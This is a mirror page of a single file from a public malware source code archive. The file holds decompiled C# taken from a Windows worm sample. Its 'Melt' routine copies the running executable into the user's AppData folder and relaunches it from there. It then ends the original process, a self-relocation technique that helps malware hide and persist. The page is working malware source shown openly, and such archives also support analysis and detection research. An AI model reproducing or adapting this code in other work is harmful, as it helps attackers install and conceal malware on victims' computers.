mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 03:16:11 +00:00
f2ac1ece55
add
40 lines
1.3 KiB
C#
40 lines
1.3 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: ajhfsdlhjasnagfgewfwsg.Melt
|
|
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.Windows.Forms;
|
|
|
|
namespace ajhfsdlhjasnagfgewfwsg
|
|
{
|
|
[StandardModule]
|
|
internal sealed class Melt
|
|
{
|
|
public static void Melt(string F)
|
|
{
|
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
|
|
if (Operators.CompareString(Application.StartupPath, folderPath, false) != 0)
|
|
{
|
|
FileSystem.FileCopy(Application.ExecutablePath, folderPath + "\\" + F);
|
|
Interaction.Shell(folderPath + "\\" + F + " " + Application.ExecutablePath);
|
|
ProjectData.EndApp();
|
|
}
|
|
else
|
|
{
|
|
Process[] processesByName = Process.GetProcessesByName(Interaction.Command());
|
|
int index = 0;
|
|
while (index < processesByName.Length)
|
|
{
|
|
processesByName[index].Kill();
|
|
checked { ++index; }
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|